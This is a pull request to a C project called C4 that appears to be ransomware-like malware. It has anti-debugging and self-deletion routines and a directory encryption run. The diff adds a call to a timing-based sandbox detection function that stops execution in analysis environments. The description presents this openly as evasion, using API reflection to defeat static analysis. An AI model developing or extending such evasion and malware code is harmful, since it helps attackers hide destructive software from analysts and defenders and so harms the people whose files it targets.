### PR TITLE
Sandbox detection

### DIFF
--- a/C4/antianalysis.h
+++ b/C4/antianalysis.h
@@ -5,6 +5,6 @@
 #define ANTI_ANALYSIS_H
 
 BOOL IsBeingDebugged();
-
+BOOL DetectSandboxTiming();
 BOOL DeleteSelf();
 #endif

--- a/C4/main.c
+++ b/C4/main.c
@@ -431,7 +431,9 @@ int main() {
   
     if (g_Verbose)
         g_StartTime = (DWORD)GetTickCount64();
-    
+
+    if (DetectSandboxTiming())
+        return -1;   
 
     if (Run(g_Directories, g_EncryptMode)) 
         PRINT(L"[>] Operation completed successfully.\n");


### PR DESCRIPTION
This pull request adds a timing-based sandbox evasion technique by introducing the DetectSandboxTiming function, which uses high-resolution performance counters to detect execution delays. API reflection is employed to invoke timing functions dynamically, reducing detection via static analysis. The function is integrated into the execution flow to halt operation when a virtualized or sandboxed environment is suspected.